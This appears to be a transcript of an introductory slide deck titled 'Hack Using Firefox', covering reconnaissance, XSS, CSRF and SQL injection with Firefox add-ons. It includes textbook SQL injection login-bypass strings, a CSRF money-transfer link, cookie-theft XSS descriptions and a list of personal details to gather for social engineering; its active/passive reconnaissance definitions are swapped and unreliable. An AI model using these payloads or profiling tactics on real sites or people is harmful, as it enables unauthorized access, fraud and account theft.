hack using firefox
TRANSCRIPT
Hack Using Firefox
Ahmad Prayitno,[email protected]
Reconnaissance Cross Site Scripting (XSS) Cross Site Request Forgery (CSRF) SQL Injection
Agenda
Reconnaissance
What is Reconaissance
Finding as much information about the target as possible before launching the first attack
Types Of Reconaissance
Active ReconaissancePassive Reconaissance
Active Reconaissance
Active reconnaissance is a type of reconnaissance in which an attacker engages with the targeted person/corporate to gather information. DNS Whois Netcraft Archives Search Engine Social Media
Passive Reconnaissance
Passive reconnaissance is an attempt to gain information about targeted person/corporate without actively engaging with the systems. Go to Target Office Interview with target Read from newspaper Etc
Useful Information
Names (administrative, technical, billing contacts) for social engineering attack
Telephone numbers Email addresses Format of email addresses eg. [email protected] Family (Wife/Husband, Childre, etc) Places Birthday
Wappalyzer WorldIP Site Information
Firefox Addon
XSS
What is XSS
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
XSS Type
Reflected XSSTriggers off of a linkInteractiveExample : victim.com/{vulnerable_here}
Stored XSSPersistentTriggers when the exploited page is viewedExample : Comment forms
XSS Attack
XSS attack works this way: The attacker identifies a web site that has one or more XSS bugs (for
example echoing data input, or lacking data input validation) The attacker crafts a special URL that includes a malformed and
malicious querystring containing HTML and script The attacker finds a victim and gets him to click the link The victim clicks the link and the victim’s browser makes a request
to the vulnerable server, passing the malicious querystring. And cookies.
The vulnerable server echoes malicious input, including the script, back to the victim’s browser
The victim’s browser executes the malicious script, which may be crafted to pass data from the victim to the attacker, or other actions
Cross-Site Scripting Attack in Action
1. The attacker sends a victim a link containing a malicious payload.
2. The victim, tricked into clicking the link, sends a request (and the payload) to the vulnerable application interface.
3. The interface (i.e. a user registration form) accepts the request (and payload), and responds with a confirmation screen. Embedded in the confirmation screen is the malicious code, which has been formatted in such a way that a browser will interpret it as if it were any other JavaScript code.
4. When the victim receives the response, the browser executes the payload, which could send cookie values (including session identifiers) and other sensitive data to the attacker.
Attack Vectors
Forms that are filled out where values are later presented to the user
Web message boards that allow users to post their own messages
Why Cookies
Because Cookies is a ticket !
Firefox Addon
XSS Me Cookie Manager etc
CSRF
What is CSRF
Cross-site request forgery, also known as one-click attack or session riding is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the website trusts. CSRF exploits the trust that a site has in a user's browser.
Cross-Site Request Forgery
Threat Models
Client Injects content onto trusted site Unauthorized Application Request
Web Attacker Owns https://www.attacker.com user visit
Example
Bank Website Request http://bank.com/transfer.do?
acct=budi&amount=100000
Attacker create link <a href="http://bank.com/transfer.do?
acct=hacker&amount=100000">View my Pictures!</a>
SQL Injection
What is SQL Injection
SQL Injection is vulnerability in web application which using this method hackers
able to inject SQL commands into the database through input form.
25
How common is it?
It is probably the most common Website vulnerability today! It is a flaw in "web application" development,
it is not a DB or web server problem Most programmers are still not aware of this problem A lot of the php tutorials & php demo are vulnerable Even worse, a lot of solutions posted on the Internet are not good
enough
26
Vulnerable Applications
Almost all SQL databases and programming languages are potentially vulnerable MS SQL Server, Oracle, MySQL,
Postgres, DB2, MS Access, Sybase, Informix, etc
PHP, ASP, etc
27
How does SQL Injection work?
Common vulnerable login query SELECT * FROM users WHERE username = 'ahmad'AND password = 'rahasia'
28
Injecting through Strings
$username = ' or ‘1’=‘1’ – – $password = anything
Final query would look like this:SELECT * FROM usersWHERE username = ' ' or ‘1’=‘1’ – – AND
password = 'anything'
29
If it were numeric?
SELECT * FROM clients WHERE account = 12345678AND pin = 1111
PHP/MySQL login syntax$sql = "SELECT * FROM clients WHERE " . "account = $formacct AND " . "pin = $formpin";
30
Injecting Numeric Fields
$formacct = 1 or 1=1 # $formpin = 1111
Final query would look like this:SELECT * FROM clientsWHERE account = 1 or 1=1 -- AND pin = 1111
Hack Bar
Firefox Addon